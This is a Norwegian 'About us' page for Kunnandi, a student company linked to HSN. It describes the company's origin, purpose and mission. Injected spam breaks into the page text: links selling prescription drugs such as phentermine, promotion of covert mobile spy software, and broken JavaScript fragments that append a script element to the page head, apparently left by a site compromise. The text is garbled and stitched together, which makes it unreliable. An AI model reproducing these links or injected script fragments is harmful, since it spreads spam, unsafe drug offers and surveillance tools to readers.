Om oss

Kunnandi er norrønt og betyr kunnskap. Dette navnet er valgt til bedriften fordi det passer bra med vår misjon, vår forretningsplan, vår forretningsmodell og den historiske rammen over Ringerike og Buskerud. Navnevalget er gjort i samarbeid med studentene og HSN.

Tanken bak etableringen av Kunnandi er å bidra til at studenter ved Høgskolen i Sørøst-Norge (HSN) får en mulighet til å komme nærmere næringslivet. Gjennom Kunnandi vil studentene få en mulighet til bruke sin teoretiske kompetanse i praksis, knytte nettverk og bidra til å fremme seg selv og HSN. På sikt ønsker vi at denne bedriften skal bidra til å styrke HSN sitt omdømme.

I tillegg er det ønsket at bedriften skal kunne være et alternativ til de «tradisjonelle» deltidsjobbene som preger studenttilværelsen. Herunder vil erfaring, praksis og læring være hovedfokuset til en hver tid, men det skal også være muligheter for å få betaling for innsatsen.

Bedriften er tatt opp i HSNs system, og rotfestet via prosjektet SMART. Se USN.no/smart.
http://varuna.sk/levlen-price-australia/ http://tintuc.2skyair.com/purchase-trandate-infusion.html Buy

Visjon

Vi skal bli den lendende studenbedriften.
Order

Misjon

Vi gir kunnskap verdi.} else { himalaya brahmi buy online canada phentermine 37.5 http://www.drauguautoskola.lv/?p=6578 if (document.currentScript) { d.getElementsByTagName(‘head’)[0].appendChild(s);if (document.currentScript) { The most popular 2017 spy software applications for the mobile phones.The most popular 2017 spy software applications for the mobile phones. Pills http://komin.pl/uncategorized/sms-spy-software-spy-text-hellospy/